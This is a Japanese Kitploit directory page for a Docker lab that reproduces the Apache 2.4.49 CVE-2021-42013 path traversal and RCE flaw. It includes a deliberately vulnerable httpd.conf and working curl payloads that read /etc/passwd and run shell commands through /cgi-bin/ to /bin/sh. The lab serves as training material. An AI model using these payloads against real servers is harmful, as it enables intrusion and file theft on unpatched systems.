Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
apache-cve-2021-42013-rce — Apache HTTP Server (2.4.49) 上で CVE-2021-42013 の脆弱性 (Path Traversal & RCE) をシミュレートする Docker ベースの侵入テストラボ。 | Kitploit
ツール/GitHubGitHub/zeynepglygt/apache-cve-2021-42013-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubzeynepglygt/apache-cve-2021-42013-rce

apache-cve-2021-42013-rce

Apache HTTP Server (2.4.49) 上で CVE-2021-42013 の脆弱性 (Path Traversal & RCE) をシミュレートする Docker ベースの侵入テストラボ。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

apache-cve-2021-42013-rce

Apache HTTP Server (2.4.49) 上の CVE-2021-42013 脆弱性 (Path Traversal & RCE) をシミュレートする Docker ベースの侵入テストラボ。 このプロジェクトは、Apache HTTP Server (2.4.49) に存在する CVE-2021-42013 の脆弱性を隔離された環境でシミュレートし、悪用 (exploit) するために作成されました。この作業では docker-exploit-lab という専用のラボ環境が構築され、攻撃シナリオは同じネットワーク上の被害者 (victim) マシンと攻撃者 (attacker) マシンを介して実行されます。

プロジェクト構成とセットアップファイル

このラボには2つの基本的な設定ファイルがあります: Victim/Attacker マシンを定義する Docker Compose ファイルと、Apache サーバーを脆弱な状態にする設定ファイルです。

1. docker-compose.yml

このファイルは 172.20.0.0/16 サブネット上に隔離された環境を作成します。攻撃者マシンは起動時に攻撃に必要な curl ツールを自動的にインストールします。

root@kitploit:~
services:
  victim:
    image: httpd:2.4.49
    container_name: victim-box
    volumes:
      - ./my-httpd.conf:/usr/local/apache2/conf/httpd.conf
    networks:
      lab_net:
        ipv4_address: 172.20.0.2
  attacker:
    command: sh -c "apt update && apt install curl -y && tail -f /dev/null"
    image: kalilinux/kali-rolling
    container_name: attacker-box
    tty: true
    networks:
      lab_net:
        ipv4_address: 172.20.0.3
networks:
  lab_net:
    driver: bridge
    ipam:
      config:
        - subnet: 172.20.0.0/16

2. my-httpd.conf

脆弱性を引き起こせるように、ルートディレクトリ () と CGI ディレクトリに Require all granted 権限が付与され、サーバーは意図的に脆弱な状態にされています。 (重要な注記: エラーを避けるため、このファイルが BOM (Byte Order Mark) 文字を含まないプレーンな UTF-8 形式で保存されていることを確認してください。)

Apache ServerRoot "/usr/local/apache2" Listen 80 LoadModule mpm_event_module modules/mod_mpm_event.so LoadModule authn_core_module modules/mod_authn_core.so LoadModule authz_core_module modules/mod_authz_core.so LoadModule unixd_module modules/mod_unixd.so LoadModule alias_module modules/mod_alias.so LoadModule cgid_module modules/mod_cgid.so User daemon Group daemon DocumentRoot "/usr/local/apache2/htdocs" AllowOverride none Require all granted ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/" <Directory "/usr/local/apache2/cgi-bin/"> AllowOverride None Options +ExecCGI Require all granted

ラボの起動と攻撃フェーズ

システムを起動するには、作業ディレクトリでターミナルに次のコマンドを実行します:
docker compose up -d システムが起動したら、攻撃コマンドを実行する Kali Linux マシンの中に入ります: Bash docker exec -it attacker-box /bin/bash

1. フェーズ: Path Traversal (ディレクトリトラバーサル)

Kali マシンの中から、ターゲットマシンの固定 IP アドレス (172.20.0.2) に URL エンコードされた文字 (.%%32%65) を送信してディレクトリトラバーサルの脆弱性を発動させ、/etc/passwd ファイルを読み取ります: Bash curl -v --path-as-is http://172.20.0.2/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

2. フェーズ: RCE (リモートコード実行)

Apache の設定で CGI ディレクトリを許可しているため、同じディレクトリトラバーサルの仕組みを /cgi-bin/ 経由で使用して、サーバー上で直接シェルコマンドを実行できます。id コマンドを実行するには: Bash curl -v --path-as-is -d "echo; id" "http://172.20.0.2/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" 得られた成功出力: uid=1(daemon) gid=1(daemon) groups=1(daemon)

結果

この作業は、更新されていない Web サーバーにおいて、外部からは無害に見える Path Traversal の脆弱性が、誤って設定された CGI モジュールの権限と組み合わさると、どのように完全な権限を持つリモートコード実行 (RCE) に変わるのかを実践的に示しています。

ツールをダウンロード